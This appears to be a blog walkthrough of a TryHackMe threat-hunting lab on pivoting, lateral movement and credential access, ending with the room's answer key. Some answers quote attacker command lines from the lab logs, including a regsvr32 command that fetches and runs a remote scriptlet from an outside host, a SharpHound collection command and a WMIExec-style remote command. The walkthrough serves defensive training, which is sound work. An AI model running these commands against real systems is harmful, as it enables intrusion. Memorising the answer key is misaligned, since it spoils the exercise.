We covered part two of threat hunting with elastic search. We covered queries and methodologies to uncover threats and attacker’s techniques such as privilege escalation, pivoting, lateral movement, credentials access & enumeration. This walkthrough was part of Threat Hunting: Pivoting room that’s part of SOC Level 2 track.
Offensive Security Certified Professional Study Notes
Hunting Discovery and Enumeration
The hunt for the Discovery Tactic involves detecting unusual information-gathering activities that typically blend with host and network administration commands. This may entail identifying known tools System Administrators use or some activities to gather host and network data and differentiating benign activities from suspicious ones based on their unusual patterns. In line with this, we will use the following scenarios to build our hunting methodology.
- Host reconnaissance activity
- Internal network scanning
- Active directory execution
Hunting Internal Network Scanning
Internal network connections are always presumed to be benign due to the assumption that they originate from legitimate host services and user activity. However, threat actors tend to blend from this noise while enumerating reachable assets for potential pivot points. One example is scanning open ports on a reachable device, which generates several connections to unique destination ports. We will hunt for behaviours that satisfy this idea.
Hunting Active Directory Enumeration
Domain Enumeration typically generates many LDAP queries. However, it is also typical for an internal network running an Active Directory to create this activity. Given this, threat actors tend to blend in the regular traffic to mask their suspicious activity of harvesting active directory objects to tailor their potential internal attack vectors. Based on this, we will focus on unusual LDAP connections.
Hunting Privilege Escalation
You may think that hunting successful privilege escalation attempts can be as easy as looking for unusual events executed by privileged accounts. However, differentiating them from benign activity could be bothersome since these accounts spawn most activities run by the operating system or System Administrators.
- Elevating access through SeImpersonatePrivilege abuse.
- Abusing excessive service permissions.
Successful privilege escalation attempts always indicate activities generated by a privileged account. In the context of abusing machine vulnerabilities, the user access is typically elevated to the NT Authority\System account.
Aside from abusing account privileges, threat actors also hunt for excessive permissions assigned to their current account access. One example is excessive service permissions allowing low-privileged users to modify and restart services running on a privileged account context.
Hunting Credential Harvesting
Hunting Credential Access involves actively searching for indicators of adversaries attempting to acquire or misuse credentials within a system or network. Recognising red flags requires a deep understanding of typical credential usage, a vigilant approach to identifying anomalies, and a sense of different methods used by adversaries to access credential vaults or locations. In line with these, we will use the following scenarios to build our hunting methodology:
- Dumping host credentials from LSASS.
- Dumping domain credentials via DCSync.
- Obtaining valid accounts via brute-forcing.
Hunting Lateral Movement
The hunt for Lateral Movement involves uncovering suspicious authentication events and remote machine access from a haystack of benign login attempts by regular users. On a typical working day in an internal network, events generating remote access to different hosts and services are expected. May it be access to a file share, remote access troubleshooting, or network-wide deployment of patches. In the following sections, we will delve deeper into strategies and techniques for hunting Lateral Movement activities, interpreting host authentication and network connection events, and recognising anomalies through the following scenarios:
- Lateral Movement via WMI.
- Authentication via Pass-the-Hash.
Room Answers | TryHackMe Threat Hunting: Pivoting
What is the name of the account seen to be executing host enumeration commands on DC01?
backupadm
Following the port scanning activity investigation, what is the parent process of n.exe?
powershell.exe
What is the full command-line value of the SharpHound.exe process?
“C:\Users\bill.hawkins\Documents\sharp\SharpHound.exe” -c all
What is the full command-line value of the process spawned by spoofer.exe?
regsvr32 /s /n /u /i:http://www.oneedirve.xyz/321c3cf/teams.sct scrobj.dll
What is the name of the other service that was abused besides SNMPTRAP?
Spooler
What is the MD5 hash of the update.exe binary?
0be0cd5d0f361be812e4eec615b9b5c4
What is the name of the process that created the lsass.DMP file?
Taskmgr.exe
Out of the four GUIDs used to hunt DCSync, what is the value of the GUID seen in the existing logs?
1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
What is the name of the first process spawned by jade.burke on WKSTN-1?
wsmprovhost.exe
What is the name of the account that also used WMIExec on WKSTN-1 aside from clifford.miller?
jade.burke
Excluding the false positive account, how many events were generated by potential Pass-the-Hash authentications?
10
Excluding the executions of the cd command, what is the full command-line value of the subsequent process spawned after the first successful PtH authentication of clifford.miller?
cmd.exe /Q /c whoami 1> \127.0.0.1\ADMIN$__1688924047.711874 2>&1
Video Walkthrough | Threat Hunting: Pivoting
